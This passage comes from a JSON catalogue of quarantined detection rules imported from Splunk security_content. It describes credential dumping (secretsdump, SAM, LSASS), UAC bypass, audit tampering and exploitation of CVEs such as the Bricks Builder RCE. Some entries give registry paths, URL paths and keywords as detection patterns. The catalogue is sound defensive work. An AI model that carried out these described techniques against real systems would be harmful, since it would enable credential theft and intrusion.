"detections/splunk-imports/_quarantine/linux-auditd-hidden-files-and-directories-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "555cc358-bf16-4e05-9b3a-0f89c73b7261", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_hidden_files_and_directories_creation.yml" } }, { "id": "splunk-security-content-55d8741c-fa32-4692-8109-410304961eb8", "type": "detection", "name": "Windows Office Product Spawned Uncommon Process", "description": "The following analytic detects a Microsoft Office product spawning uncommon processes. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where Office applications are the parent process. This activity is significant as it may indicate an attempt of a malicious macro execution or exploitation of an unknown vulnerability in an office product, in order to bypass security controls. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55d8741c-fa32-4692-8109-410304961eb8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_uncommon_process.yml" } }, { "id": "splunk-security-content-55f22929-cfd3-4388-ba5c-4d01fac7ee7e", "type": "detection", "name": "Windows IIS Components New Module Added", "description": "The following analytic detects the addition of new IIS modules on a Windows IIS server. It leverages the Windows Event log - Microsoft-IIS-Configuration/Operational, specifically EventCode 29, to identify this activity. This behavior is significant because IIS modules are rarely added to production servers, and unauthorized modules could indicate malicious activity. If confirmed malicious, an attacker could use these modules to execute arbitrary code, escalate privileges, or maintain persistence within the environment, potentially compromising the server and sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-components-new-module-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55f22929-cfd3-4388-ba5c-4d01fac7ee7e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iis_components_new_module_added.yml" } }, { "id": "splunk-security-content-55fb2958-9ecd-11ec-a06a-acde48001122", "type": "detection", "name": "Windows Disable Shutdown Button Through Registry", "description": "The following analytic detects suspicious registry modifications that disable the shutdown button on a user's logon screen. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with shutdown policies. This activity is significant because it is a tactic used by malware, particularly ransomware like KillDisk, to hinder system usability and prevent the removal of malicious changes. If confirmed malicious, this could impede system recovery efforts, making it difficult to restart the machine and remove other harmful modifications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-shutdown-button-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "55fb2958-9ecd-11ec-a06a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_shutdown_button_through_registry.yml" } }, { "id": "splunk-security-content-5628e0b7-73dc-4f1b-b37a-6e68efc2225f", "type": "detection", "name": "Windows Audit Policy Security Descriptor Tampering via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/set\" flag, and \"/sd\" command-line arguments used to modify the security descriptor of the audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. An attacker, can disable certain policy categories from logging and then change the security descriptor in order to restrict access to certain users or application from reverting their changes. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-security-descriptor-tampering-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5628e0b7-73dc-4f1b-b37a-6e68efc2225f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_security_descriptor_tampering_via_auditpol.yml" } }, { "id": "splunk-security-content-5643cdc9-a0be-4123-860b-f13da0bf4fcb", "type": "detection", "name": "ESXi VM Discovery", "description": "This detection identifies the use of ESXCLI commands to discover virtual machines on an ESXi host While used by administrators, this activity may also indicate adversary reconnaissance aimed at identifying high value targets, mapping the virtual environment, or preparing for data theft or destructive operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1673" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-vm-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5643cdc9-a0be-4123-860b-f13da0bf4fcb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_vm_discovery.yml" } }, { "id": "splunk-security-content-5672819c-be09-11eb-bbfb-acde48001122", "type": "detection", "name": "SecretDumps Offline NTDS Dumping Tool", "description": "The following analytic detects the potential use of the secretsdump.py tool to dump NTLM hashes from a copy of ntds.dit and the SAM, SYSTEM, and SECURITY registry hives. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns and process names associated with secretsdump.py. This activity is significant because it indicates an attempt to extract sensitive credential information offline, which is a common post-exploitation technique. If confirmed malicious, this could allow an attacker to obtain NTLM hashes, facilitating further lateral movement and potential privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/secretdumps-offline-ntds-dumping-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5672819c-be09-11eb-bbfb-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/secretdumps_offline_ntds_dumping_tool.yml" } }, { "id": "splunk-security-content-5682052e-ce55-4f9f-8d28-59191420b7e0", "type": "detection", "name": "Windows AD Suspicious Attribute Modification", "description": "This detection monitors changes to the following Active Directory attributes: \"msDS-AllowedToDelegateTo\", \"msDS-AllowedToActOnBehalfOfOtherIdentity\", \"msDS-KeyCredentialLink\", \"scriptPath\", and \"msTSInitialProgram\". Modifications to these attributes can indicate potential malicious activity or privilege escalation attempts. Immediate investigation is recommended upon alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-suspicious-attribute-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5682052e-ce55-4f9f-8d28-59191420b7e0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_suspicious_attribute_modification.yml" } }, { "id": "splunk-security-content-568cb83e-d79e-4a23-85ec-6e1f6c30cb2f", "type": "detection", "name": "Cisco NVM - Suspicious Network Connection to IP Lookup Service API", "description": "This analytic identifies non-browser processes reaching out to public IP lookup or geolocation services,\nsuch as `ipinfo.io`, `icanhazip.com`, `ip-api.com`, and others.\nThese domains are commonly used by legitimate tools, but their usage outside of browsers may indicate\nnetwork reconnaissance, virtual machine detection, or staging by malware.\nThis activity is observed in post-exploitation frameworks, stealer malware, and advanced threat actor campaigns.\nThe detection relies on Cisco Network Visibility Module (NVM) telemetry and excludes known browser\nprocesses to reduce noise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.005", "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-network-connection-to-ip-lookup-service-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "568cb83e-d79e-4a23-85ec-6e1f6c30cb2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_network_connection_to_ip_lookup_service_api.yml" } }, { "id": "splunk-security-content-56a3ac65-e747-41f7-b014-dff7423c1dda", "type": "detection", "name": "ConnectWise ScreenConnect Path Traversal", "description": "The following analytic detects attempts to exploit the ConnectWise ScreenConnect CVE-2024-1708 vulnerability, which allows path traversal attacks by manipulating file_path and file_name parameters in the URL. It leverages the Endpoint datamodel Filesystem node to identify suspicious file system events, specifically targeting paths and filenames associated with ScreenConnect. This activity is significant as it can lead to unauthorized access to sensitive files and directories, potentially resulting in data exfiltration or arbitrary code execution. If confirmed malicious, attackers could gain unauthorized access and control over the host system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/connectwise-screenconnect-path-traversal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56a3ac65-e747-41f7-b014-dff7423c1dda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/connectwise_screenconnect_path_traversal.yml" } }, { "id": "splunk-security-content-56a8771a-3fda-4959-b81d-2f266e2f679f", "type": "detection", "name": "WordPress Bricks Builder plugin RCE", "description": "The following analytic identifies potential exploitation of the WordPress Bricks Builder plugin RCE vulnerability. It detects HTTP POST requests to the URL path \"/wp-json/bricks/v1/render_element\" with a status code of 200, leveraging the Web datamodel. This activity is significant as it indicates an attempt to exploit CVE-2024-25600, a known vulnerability that allows remote code execution. If confirmed malicious, an attacker could execute arbitrary commands on the target server, leading to potential full system compromise and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wordpress-bricks-builder-plugin-rce.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56a8771a-3fda-4959-b81d-2f266e2f679f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/wordpress_bricks_builder_plugin_rce.yml" } }, { "id": "splunk-security-content-56b2e58c-5909-49a3-998e-1f4815186ec2", "type": "detection", "name": "Windows Advanced Installer MSIX with AI_STUBS Execution", "description": "The following analytic identifies the execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically the AI_STUBS executables with the original filename 'popupwrapper.exe'. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process paths and original filenames. This activity is significant as adversaries have been observed packaging malicious content within MSIX files built with Advanced Installer to bypass security controls. These AI_STUBS executables (with original filename 'popupwrapper.exe') are hallmark artifacts of potentially malicious MSIX packages. If confirmed malicious, this could allow attackers to execute arbitrary code, establish persistence, or deliver malware while evading traditional detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-advanced-installer-msix-with-ai-stubs-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56b2e58c-5909-49a3-998e-1f4815186ec2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_advanced_installer_msix_with_ai_stubs_execution.yml" } }, { "id": "splunk-security-content-56d7cfcc-da63-11eb-92d4-acde48001122", "type": "detection", "name": "SilentCleanup UAC Bypass", "description": "The following analytic detects suspicious modifications to the registry that may indicate a UAC (User Account Control) bypass attempt via the SilentCleanup task. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry changes in the path \"*\\\\Environment\\\\windir\" with executable values. This activity is significant as it can allow an attacker to gain high-privilege execution without user consent, bypassing UAC protections. If confirmed malicious, this could lead to unauthorized administrative access, enabling further system compromise and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/silentcleanup-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56d7cfcc-da63-11eb-92d4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/silentcleanup_uac_bypass.yml" } }, { "id": "splunk-security-content-56e877a6-1455-4479-ada6-0550dc1e22f8", "type": "detection", "name": "Email Attachments With Lots Of Spaces", "description": "The following analytic detects email attachments with an unusually high number of spaces in their file names, which is a common tactic used by attackers to obfuscate file extensions. It leverages the Email data model to identify attachments where the ratio of spaces to the total file name length exceeds 10%. This behavior is significant as it may indicate an attempt to bypass security filters and deliver malicious payloads. If confirmed malicious, this activity could lead to the execution of harmful code or unauthorized access to sensitive information within the recipient's environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1036.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/email-attachments-with-lots-of-spaces.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56e877a6-1455-4479-ada6-0550dc1e22f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/email_attachments_with_lots_of_spaces.yml" } }, { "id": "splunk-security-content-56fe46ca-ffef-46fe-8f0e-5cd4b7b4cc0c", "type": "detection", "name": "Windows Compatibility Telemetry Suspicious Child Process", "description": "The following analytic detects the execution of CompatTelRunner.exe with parameters indicative of a process not part of the normal \"Microsoft Compatibility Appraiser\" telemetry collection. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line arguments. This activity is significant because CompatTelRunner.exe and the \"Microsoft Compatibility Appraiser\" task always run as System and can be used to elevate privileges or establish a highly privileged persistence mechanism. If confirmed malicious, this could enable unauthorized code execution, privilege escalation, or persistent access to the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-compatibility-telemetry-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "56fe46ca-ffef-46fe-8f0e-5cd4b7b4cc0c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_compatibility_telemetry_suspicious_child_process.yml" } }, { "id": "splunk-security-content-5728bb16-1a0b-4b66-bce2-0074ac839770", "type": "detection", "name": "Linux Auditd Hardware Addition Swapoff", "description": "The following analytic detects the execution of the \"swapoff\" command, which disables the swapping of paging devices on a Linux system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because disabling swap can be a tactic used by malware, such as Awfulshred, to evade detection and hinder forensic analysis. If confirmed malicious, this action could allow an attacker to manipulate system memory management, potentially leading to data corruption, system instability, or evasion of memory-based detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-hardware-addition-swapoff.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5728bb16-1a0b-4b66-bce2-0074ac839770", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_hardware_addition_swapoff.yml" } }, { "id": "splunk-security-content-57551656-ebdb-11eb-afdf-acde48001122", "type": "detection", "name": "SAM Database File Access Attempt", "description": "The following analytic detects attempts to access the SAM, SYSTEM, or SECURITY database files within the `windows\\system32\\config` directory using Windows Security EventCode 4663. This detection leverages Windows Security Event logs to identify unauthorized access attempts. Monitoring this activity is crucial as it indicates potential credential access attempts, possibly exploiting vulnerabilities like CVE-2021-36934. If confirmed malicious, an attacker could extract user passwords, leading to unauthorized access, privilege escalation, and further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sam-database-file-access-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57551656-ebdb-11eb-afdf-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sam_database_file_access_attempt.yml" } }, { "id": "splunk-security-content-5790a766-53b8-40d3-a696-3547b978fcf0", "type": "detection", "name": "Ngrok Reverse Proxy on Network", "description": "The following analytic detects DNS queries to common Ngrok domains, indicating potential use of the Ngrok reverse proxy tool. It leverages the Network Resolution datamodel to identify queries to domains such as \"*.ngrok.com\" and \"*.ngrok.io\". While Ngrok usage is not inherently malicious, it has been increasingly adopted by adversaries for covert communication and data exfiltration. If confirmed malicious, this activity could allow attackers to bypass network defenses, establish persistent connections, and exfiltrate sensitive data, posing a significant threat to the network's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ngrok-reverse-proxy-on-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5790a766-53b8-40d3-a696-3547b978fcf0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/ngrok_reverse_proxy_on_network.yml" } }, { "id": "splunk-security-content-5796b570-ad12-44df-b1b5-b7e6ae3aabb0", "type": "detection", "name": "VMware Server Side Template Injection Hunt", "description": "The following analytic identifies potential server-side template injection attempts related to CVE-2022-22954.\nIt detects suspicious URL patterns containing \"deviceudid\" and keywords like \"java.lang.ProcessBuilder\" or \"freemarker.template.utility.ObjectConstructor\" using web or proxy logs within the Web Datamodel.\nThis activity is significant as it may indicate an attempt to exploit a known vulnerability in VMware, potentially leading to remote code execution.\nIf confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, and compromise the affected system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/vmware-server-side-template-injection-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5796b570-ad12-44df-b1b5-b7e6ae3aabb0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/vmware_server_side_template_injection_hunt.yml" } }, { "id": "splunk-security-content-57a0a2bf-353f-40c1-84dc-29293f3c35b7", "type": "detection", "name": "Unusually Long Content-Type Length", "description": "The following analytic identifies unusually long strings in the Content-Type HTTP header sent by the client to the server. It uses data from the Stream:HTTP source, specifically evaluating the length of the `cs_content_type` field. This activity is significant because excessively long Content-Type headers can indicate attempts to exploit vulnerabilities or evade detection mechanisms. If confirmed malicious, this behavior could allow attackers to execute code, manipulate data, or bypass security controls, potentially leading to unauthorized access or data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusually-long-content-type-length.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57a0a2bf-353f-40c1-84dc-29293f3c35b7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/unusually_long_content_type_length.yml" } }, { "id": "splunk-security-content-57ad5a64-9df7-11eb-a290-acde48001122", "type": "detection", "name": "Windows Multiple Invalid Users Failed To Authenticate Using NTLM", "description": "The following analytic detects a single source endpoint failing to authenticate with 30 unique invalid users using the NTLM protocol. It leverages EventCode 4776 from Domain Controller logs, focusing on error code 0xC0000064, which indicates non-existent usernames. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information within the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-invalid-users-failed-to-authenticate-using-ntlm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57ad5a64-9df7-11eb-a290-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_invalid_users_failed_to_authenticate_using_ntlm.yml" } }, { "id": "splunk-security-content-57d44d70-28d9-4ed1-acf5-1c80ae2bbce3", "type": "detection", "name": "Ryuk Test Files Detected", "description": "The following analytic identifies the presence of files containing the keyword \"Ryuk\" in any folder on the C drive, indicative of Ryuk ransomware activity. It leverages the Endpoint Filesystem data model to detect file paths matching this pattern. This activity is significant as Ryuk ransomware is known for its destructive impact, encrypting critical files and demanding ransom. If confirmed malicious, this could lead to significant data loss, operational disruption, and financial damage due to ransom payments and recovery efforts. Immediate investigation and response are crucial to mitigate potential damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ryuk-test-files-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57d44d70-28d9-4ed1-acf5-1c80ae2bbce3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ryuk_test_files_detected.yml" } }, { "id": "splunk-security-content-57e27f27-369c-4df8-af08-e8c7ee8373d4", "type": "detection", "name": "Windows AD Short Lived Domain Controller SPN Attribute", "description": "The following analytic detects the temporary addition of a global catalog SPN or a DRS RPC SPN to an Active Directory computer object, indicative of a potential DCShadow attack. This detection leverages EventCode 5136 from the `wineventlog_security` data source, focusing on specific SPN attribute changes. This activity is significant as DCShadow attacks allow attackers with privileged access to register rogue Domain Controllers, enabling unauthorized changes to the AD infrastructure. If confirmed malicious, this could lead to unauthorized replication of changes, including credentials and keys, compromising the entire domain's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-short-lived-domain-controller-spn-attribute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57e27f27-369c-4df8-af08-e8c7ee8373d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_short_lived_domain_controller_spn_attribute.yml" } }, { "id": "splunk-security-content-57fb8656-141e-4d8a-9f51-62cff4ecb82a", "type": "detection", "name": "Windows Autostart Execution LSASS Driver Registry Modification", "description": "The following analytic detects modifications to undocumented registry keys that allow a DLL to load into lsass.exe, potentially capturing credentials. It leverages the Endpoint.Registry data model to identify changes to \\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt or \\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt. This activity is significant as it indicates a possible attempt to inject malicious code into the Local Security Authority Subsystem Service (LSASS), which can lead to credential theft. If confirmed malicious, this could allow attackers to gain unauthorized access to sensitive information and escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-autostart-execution-lsass-driver-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "57fb8656-141e-4d8a-9f51-62cff4ecb82a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_autostart_execution_lsass_driver_registry_modification.yml" } }, { "id": "splunk-security-content-58194e28-ae5e-11eb-8912-acde48001122", "type": "detection", "name": "Download Files Using Telegram", "description": "The following analytic detects suspicious file downloads by the Telegram application on a Windows system. It leverages Sysmon EventCode 15 